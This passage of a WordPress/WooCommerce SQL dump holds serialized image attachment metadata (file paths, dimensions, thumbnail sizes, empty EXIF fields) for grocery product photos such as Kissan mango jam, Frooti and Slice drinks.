;i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:994;}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"Kissan-mango-jam-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"Kissan-mango-jam-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:28:\"Kissan-mango-jam-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"Kissan-mango-jam-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:26:\"Kissan-mango-jam-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:26:\"Kissan-mango-jam-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5030,1104,'_wp_attached_file','2022/03/frooti-600ml.jpg'),(5031,1104,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:657;s:6:\"height\";i:1500;s:4:\"file\";s:24:\"2022/03/frooti-600ml.jpg\";s:8:\"filesize\";i:83383;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:24:\"frooti-600ml-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12490;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"frooti-600ml-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2486;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"frooti-600ml-50x114.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:114;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1755;}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"frooti-600ml-131x300.jpg\";s:5:\"width\";i:131;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:25:\"frooti-600ml-449x1024.jpg\";s:5:\"width\";i:449;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"frooti-600ml-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:24:\"frooti-600ml-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:25:\"frooti-600ml-600x1370.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:1370;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:24:\"frooti-600ml-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:23:\"frooti-600ml-48x110.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:23:\"frooti-600ml-48x110.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5035,1106,'_wp_attached_file','2022/03/600ml.jpg'),(5036,1106,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:17:\"2022/03/600ml.jpg\";s:8:\"filesize\";i:10166;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:17:\"600ml-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7168;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:17:\"600ml-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2263;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:15:\"600ml-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1576;}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"600ml-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"600ml-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:17:\"600ml-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:17:\"600ml-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:15:\"600ml-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:15:\"600ml-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5066,1108,'_wp_attached_file','2022/03/2l.jpg'),(5067,1108,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:14:\"2022/03/2l.jpg\";s:8:\"filesize\";i:9021;s:5:\"sizes\";a:7:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"2l-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1948;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"2l-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:872;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"2l-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"2l-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"2l-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"2l-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"2l-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5115,1110,'_wp_attached_file','2022/03/paper-1L.jpg'),(5116,1110,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:20:\"2022/03/paper-1L.jpg\";s:8:\"filesize\";i:29158;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:20:\"paper-1L-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11505;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"paper-1L-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2272;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"paper-1L-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1028;}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"paper-1L-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"paper-1L-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"paper-1L-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"paper-1L-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"paper-1L-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:18:\"paper-1L-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:18:\"paper-1L-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5211,1112,'_wp_attached_file','2022/03/16.png'),(5212,1112,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:529;s:6:\"height\";i:400;s:4:\"file\";s:14:\"2022/03/16.png\";s:8:\"filesize\";i:241322;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"16-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104766;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"16-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:16368;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"16-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4114;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"16-300x227.png\";s:5:\"width\";i:300;s:6:\"height\";i:227;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"16-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"16-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:14:\"16-500x378.png\";s:5:\"width\";i:500;s:6:\"height\";i:378;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"16-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"16-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"16-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5213,1113,'_wp_attached_file','2022/03/05.png'),(5214,1113,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:521;s:6:\"height\";i:397;s:4:\"file\";s:14:\"2022/03/05.png\";s:8:\"filesize\";i:181012;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"05-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:86406;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"05-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13612;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"05-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3248;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"05-300x229.png\";s:5:\"width\";i:300;s:6:\"height\";i:229;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"05-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:14:\"05-500x381.png\";s:5:\"width\";i:500;s:6:\"height\";i:381;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"05-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"05-48x37.png\";s:5:\"width\";i:48;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"05-48x37.png\";s:5:\"width\";i:48;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5239,1115,'_wp_attached_file','2022/03/slice-1.2L.jpg'),(5240,1115,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:900;s:4:\"file\";s:22:\"2022/03/slice-1.2L.jpg\";s:8:\"filesize\";i:32368;s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"slice-1.2L-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7140;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"slice-1.2L-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1554;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:20:\"slice-1.2L-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:776;}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"slice-1.2L-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"slice-1.2L-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"slice-1.2L-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:22:\"slice-1.2L-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"slice-1.2L-500x500.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"slice-1.2L-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:20:\"slice-1.2L-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:20:\"slice-1.2L-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5290,1118,'_wp_attached_file','2022/03/Totapuri_mango1.jpg'),(5291,1118,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:263;s:6:\"height\";i:220;s:4:\"file\";s:27:\"2022/03/Totapuri_mango1.jpg\";s:8:\"filesize\";i:18297;s:5:\"sizes\";a:6:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"Totapuri_mango1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2750;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"Totapuri_mango1-50x42.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:42;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1163;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Totapuri_mango1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Totapuri_mango1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:25:\"Totapuri_mango1-48x40.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:40;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:25:\"Totapuri_mango1-48x40.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:40;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5340,1121,'_wp_attached_file','2022/03/11.png'),(5341,1121,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:516;s:6:\"height\";i:392;s:4:\"file\";s:14:\"2022/03/11.png\";s:8:\"filesize\";i:282149;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"11-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:132419;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19472;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"11-50x38.png\";s:5:\"width\";i:50;s:6:\"height\";i:38;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4656;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"11-300x228.png\";s:5:\"width\";i:300;s:6:\"height\";i:228;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"11-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:14:\"11-500x380.png\";s:5:\"width\";i:500;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"11-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"11-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"11-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5390,1124,'_wp_attached_file','2022/03/03.png'),(5391,1124,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:535;s:6:\"height\";i:398;s:4:\"file\";s:14:\"2022/03/03.png\";s:8:\"filesize\";i:407495;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:179355;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:23450;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"03-50x37.png\";s:5:\"width\";i:50;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4916;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"03-300x223.png\";s:5:\"width\";i:300;s:6:\"height\";i:223;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"03-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:14:\"03-500x372.png\";s:5:\"width\";i:500;s:6:\"height\";i:372;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"03-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"03-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"03-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5440,1127,'_wp_attached_file','2022/03/04.png'),(5441,1127,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:519;s:6:\"height\";i